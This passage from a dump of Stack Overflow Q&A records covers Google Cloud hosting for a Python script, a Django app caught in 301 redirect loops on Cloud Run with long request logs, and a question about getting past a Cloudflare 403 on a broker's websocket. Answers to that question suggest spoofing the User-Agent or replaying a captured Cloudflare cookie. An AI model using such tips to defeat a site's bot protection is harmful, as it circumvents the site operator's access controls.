Please help me i want to host my script on google cloud so i want to make sure that my script will work there same as it is working on local system so my money will not lost .","Title":"Will Google Cloud run this type of application?","Tags":"python,google-cloud-platform","AnswerCount":2,"A_Id":75434722,"Answer":"If you want to run 24\/7 application on the cloud, whatever the cloud, you must not use solution with timeout (like Cloud Run or Cloud Functions).\nYou can imagine using App Engine flex, but it won't be my best advice.\nThe most efficient for me (low maintenance, cost efficient), is to use GKE autopilot. A Kubernetes cluster managed for you, you pay only the CPU\/Memory that your workloads use.\nYou have to containerize your app to do that.","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75430030,"CreationDate":"2023-02-12 20:37:44","Q_Score":1,"ViewCount":212,"Question":"how to bypass HTTP\/1.1 403 Forbidden in connect to wss:\/\/ws2.qxbroker.com\/socket.io\/EIO=3&transport=websocket, i try change user-agent and try use proxy and add cookis but not work\nclass WebsocketClient(object):\n\n\n def __init__(self, api):\n websocket.enableTrace(True)\n Origin = 'Origin: https:\/\/qxbroker.com'\n Extensions = 'Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits'\n Host = 'Host: ws2.qxbroker.com'\n Agent = 'User-Agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/108.0.0.0 Safari\/537.36 OPR\/94.0.0.0'\n \n self.api = api\n self.wss=websocket.WebSocketApp(('wss:\/\/ws2.qxbroker.com\/socket.io\/EIO=3&transport=websocket'), on_message=(self.on_message),\n on_error=(self.on_error),\n on_close=(self.on_close),\n on_open=(self.on_open),\n header=[Origin,Extensions,Agent])\n\n\nrequest and response header this site protect with cloudflare\n--- request header ---\nGET \/socket.io\/?EIO=3&transport=websocket HTTP\/1.1\nUpgrade: websocket\nHost: 
ws2.qxbroker.com\nSec-WebSocket-Key: 7DgEjWxUp8N8PVY7N7vyDw==\nSec-WebSocket-Version: 13\nConnection: Upgrade\nOrigin: https:\/\/qxbroker.com\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/95.0.4638.69 Safari\/537.36\n-----------------------\n--- response header ---\nHTTP\/1.1 403 Forbidden\nDate: Sat, 11 Feb 2023 23:33:11 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: close\nPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()\nReferrer-Policy: same-origin\nX-Frame-Options: SAMEORIGIN\nCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nExpires: Thu, 01 Jan 1970 00:00:01 GMT\nSet-Cookie: __cf_bm=7TD4hk4.bntJRdP6w9K.AjXF5MsV9LERTJV00jL2Uww-1676158391-0-AZFOKw90ZYdyy4RxX1xJ4jZQMt74+3UkQDZpDrdXE8BxGJULfe8j0T8EZnpUNXr2W3YHd\/FxRoO\/bPhKA2Dc0E0=; path=\/; expires=Sun, 12-Feb-23 00:03:11 GMT; domain=.qxbroker.com; HttpOnly; Secure; SameSite=None\nServer-Timing: cf-q-config;dur=6.9999950937927e-06\nServer: cloudflare\nCF-RAY: 7980e3583b6a0785-MRS","Title":"How to creat connection websocket qxbroker in python","Tags":"python-3.x,websocket,cloudflare","AnswerCount":2,"A_Id":75525970,"Answer":"Sending cookies in websocketapp argument?\n\"__cf_bm=7TD4hk4.bntJRdP6w9K.AjXF5MsV9LERTJV00jL2Uww-1676158391-0-AZFOKw90ZYdyy4RxX1xJ4jZQMt74+3UkQDZpDrdXE8BxGJULfe8j0T8EZnpUNXr2W3YHd\/FxRoO\/bPhKA2Dc0E0=; path=\/; expires=Sun, 12-Feb-23 00:03:11 GMT; domain=.qxbroker.com; HttpOnly; Secure; SameSite=None\"","Users Score":-1,"is_accepted":false,"Score":-0.0996679946,"Available Count":2},{"Q_Id":75430030,"CreationDate":"2023-02-12 20:37:44","Q_Score":1,"ViewCount":212,"Question":"how to bypass HTTP\/1.1 403 Forbidden in 
connect to wss:\/\/ws2.qxbroker.com\/socket.io\/EIO=3&transport=websocket, i try change user-agent and try use proxy and add cookis but not work\nclass WebsocketClient(object):\n\n\n def __init__(self, api):\n websocket.enableTrace(True)\n Origin = 'Origin: https:\/\/qxbroker.com'\n Extensions = 'Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits'\n Host = 'Host: ws2.qxbroker.com'\n Agent = 'User-Agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/108.0.0.0 Safari\/537.36 OPR\/94.0.0.0'\n \n self.api = api\n self.wss=websocket.WebSocketApp(('wss:\/\/ws2.qxbroker.com\/socket.io\/EIO=3&transport=websocket'), on_message=(self.on_message),\n on_error=(self.on_error),\n on_close=(self.on_close),\n on_open=(self.on_open),\n header=[Origin,Extensions,Agent])\n\n\nrequest and response header this site protect with cloudflare\n--- request header ---\nGET \/socket.io\/?EIO=3&transport=websocket HTTP\/1.1\nUpgrade: websocket\nHost: ws2.qxbroker.com\nSec-WebSocket-Key: 7DgEjWxUp8N8PVY7N7vyDw==\nSec-WebSocket-Version: 13\nConnection: Upgrade\nOrigin: https:\/\/qxbroker.com\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/95.0.4638.69 Safari\/537.36\n-----------------------\n--- response header ---\nHTTP\/1.1 403 Forbidden\nDate: Sat, 11 Feb 2023 23:33:11 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: close\nPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()\nReferrer-Policy: same-origin\nX-Frame-Options: SAMEORIGIN\nCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nExpires: Thu, 01 Jan 1970 00:00:01 GMT\nSet-Cookie: 
__cf_bm=7TD4hk4.bntJRdP6w9K.AjXF5MsV9LERTJV00jL2Uww-1676158391-0-AZFOKw90ZYdyy4RxX1xJ4jZQMt74+3UkQDZpDrdXE8BxGJULfe8j0T8EZnpUNXr2W3YHd\/FxRoO\/bPhKA2Dc0E0=; path=\/; expires=Sun, 12-Feb-23 00:03:11 GMT; domain=.qxbroker.com; HttpOnly; Secure; SameSite=None\nServer-Timing: cf-q-config;dur=6.9999950937927e-06\nServer: cloudflare\nCF-RAY: 7980e3583b6a0785-MRS","Title":"How to creat connection websocket qxbroker in python","Tags":"python-3.x,websocket,cloudflare","AnswerCount":2,"A_Id":75536817,"Answer":"i resolved the problem sending \"header\" parameter = {\n\"User-Agent\": \"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko)\"\n}","Users Score":2,"is_accepted":false,"Score":0.1973753202,"Available Count":2},{"Q_Id":75430998,"CreationDate":"2023-02-13 00:16:54","Q_Score":2,"ViewCount":106,"Question":"I am trying to deploy a Django app in a container to Cloud Run. I have it running well locally using Docker. However, when I deploy it to Cloud Run, I get infinite 301 redirects. The Cloud Run logs do not seem to show any meaningful info about why that happens. Below is my Dockerfile that I use for deployment:\n# Pull base image\nFROM python:3.9.0\n\n# Set environment variables\nENV PIP_DISABLE_PIP_VERSION_CHECK 1\nENV PYTHONDONTWRITEBYTECODE 1\nENV PYTHONUNBUFFERED 1\n\n# Set work directory\nWORKDIR \/code\n\n# Install dependencies\nCOPY requirements.txt requirements.txt\nRUN pip install -r requirements.txt && \\\n adduser --disabled-password --no-create-home django-user\n\n# Copy project\nCOPY . \/code\n\nUSER django-user\n\n# Run server\nCMD exec gunicorn -b :$PORT my_app.wsgi:application\n\nI store all the sensitive info in Secrets Manager, and the connection to it seems to work fine (I know because I had an issue with it and now I fixed that).\nCould you suggest what I might have done wrong, or where can I look for hints as to why the redirects happen? 
Thank you!\nEDIT:\nHere are the settings for ALLOWED_HOSTS and ROOT_URLCONF\nCLOUDRUN_SERVICE_URL = env(\"CLOUDRUN_SERVICE_URL\", default=None)\nif CLOUDRUN_SERVICE_URL:\n ALLOWED_HOSTS = [urlparse(CLOUDRUN_SERVICE_URL).netloc]\n CSRF_TRUSTED_ORIGINS = [CLOUDRUN_SERVICE_URL]\n # SECURE_SSL_REDIRECT = True\n SECURE_PROXY_SSL_HEADER = (\"HTTP_X_FORWARDED_PROTO\", \"https\")\nelse:\n ALLOWED_HOSTS = [\"*\"]\n\nROOT_URLCONF = 'my_app.urls'\n\nEDIT 2:\nHere are the Cloud Run logs:\n[\n {\n \"insertId\": \"63ea0f3a0009301fc1588a44\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.016940322s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"configuration_name\": \"stokkio-test\",\n \"project_id\": \"stokkio\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"service_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.602143Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/64be6aa2f943773a97b8dca48c08183f\",\n \"receiveTimestamp\": \"2023-02-13T10:21:46.738718368Z\",\n \"spanId\": \"12503801728925259527\"\n },\n {\n \"insertId\": \"63ea0f3a000a1ab20ae2502b\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n 
\"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015862415s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"project_id\": \"stokkio\",\n \"location\": \"europe-west4\",\n \"service_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.662194Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/b9918384299b4f2d5abaf95d3b191b52\",\n \"receiveTimestamp\": \"2023-02-13T10:21:46.738718368Z\",\n \"spanId\": \"4996242098785213790\"\n },\n {\n \"insertId\": \"63ea0f3a000aca32edc19ff5\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015062643s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"project_id\": \"stokkio\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\",\n \"service_name\": \"stokkio-test\",\n \"location\": \"europe-west4\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.707122Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": 
\"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/902a25de57f137b27daadd636246369a\",\n \"receiveTimestamp\": \"2023-02-13T10:21:46.738718368Z\",\n \"spanId\": \"12127042401513465971\"\n },\n {\n \"insertId\": \"63ea0f3a000b8d87125ec41c\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"720\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.016173479s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"service_name\": \"stokkio-test\",\n \"location\": \"europe-west4\",\n \"configuration_name\": \"stokkio-test\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.757127Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/02532852f1783bc16f2b66b7941c300e\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"5082316244221461602\"\n },\n {\n \"insertId\": \"63ea0f3a000ce2f9bb9dbffa\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) 
Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.017867221s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"service_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\",\n \"location\": \"europe-west4\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.844537Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/933a163da353fbb6b81f2f4bb37cff36\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"5044082674168555502\"\n },\n {\n \"insertId\": \"63ea0f3a000d9928e046cc4c\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"720\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015601548s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"location\": \"europe-west4\",\n \"project_id\": \"stokkio\",\n \"service_name\": \"stokkio-test\",\n \"configuration_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.891176Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": 
\"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/37376b9045f8fc7b148437d39ba49bfe\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"3090697929386714415\"\n },\n {\n \"insertId\": \"63ea0f3a000e47cbe8acf1d4\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"720\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015684058s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"configuration_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"service_name\": \"stokkio-test\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.935883Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/1aef8aebf520c8b999ff475465ae402d\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"5530487600267712102\"\n },\n {\n \"insertId\": \"63ea0f3a000f124e3e217c45\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.017848766s\",\n \"protocol\": 
\"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"project_id\": \"stokkio\",\n \"configuration_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"service_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.987726Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/fa978438d859dd302167f39f941934ec\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"1186815225754169043\"\n },\n {\n \"insertId\": \"63ea0f3b00008ee9db5031dc\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015688891s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"service_name\": \"stokkio-test\",\n \"configuration_name\": \"stokkio-test\",\n \"project_id\": \"stokkio\",\n \"revision_name\": \"stokkio-test-00007-nah\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.036585Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/24aedf0be321b5b72768e877459d8ceb\",\n \"receiveTimestamp\": 
\"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"10950882171467594641\"\n },\n {\n \"insertId\": \"63ea0f3b00015a4c9feb5375\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"718\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.017323986s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\",\n \"service_name\": \"stokkio-test\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.088652Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/bc99cdb404d30d79eeca345aa9e1e08f\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"9075675780908094052\"\n },\n {\n \"insertId\": \"63ea0f3b00020e2a8050452d\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"720\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015765805s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"project_id\": \"stokkio\",\n \"revision_name\": 
\"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\",\n \"service_name\": \"stokkio-test\",\n \"location\": \"europe-west4\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.134698Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/2ff445dd04e8f2d88a65f45af2a15e00\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"93159101454760213\"\n },\n {\n \"insertId\": \"63ea0f3b0002e5a790b8b27f\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"718\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.016101403s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\",\n \"service_name\": \"stokkio-test\",\n \"location\": \"europe-west4\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.189863Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/33c3a83942c227fd78262d7bbd5e3c0c\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"1509834668974463252\"\n },\n {\n \"insertId\": \"63ea0f3b00039c080261c60b\",\n 
\"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015538512s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"service_name\": \"stokkio-test\",\n \"configuration_name\": \"stokkio-test\",\n \"location\": \"europe-west4\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.236552Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/34452d901bf9e91f11103df834fa9e40\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"8356040364675355850\"\n },\n {\n \"insertId\": \"63ea0f3b0004863bb01e0463\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.014853111s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"configuration_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"project_id\": \"stokkio\",\n \"service_name\": \"stokkio-test\"\n }\n },\n 
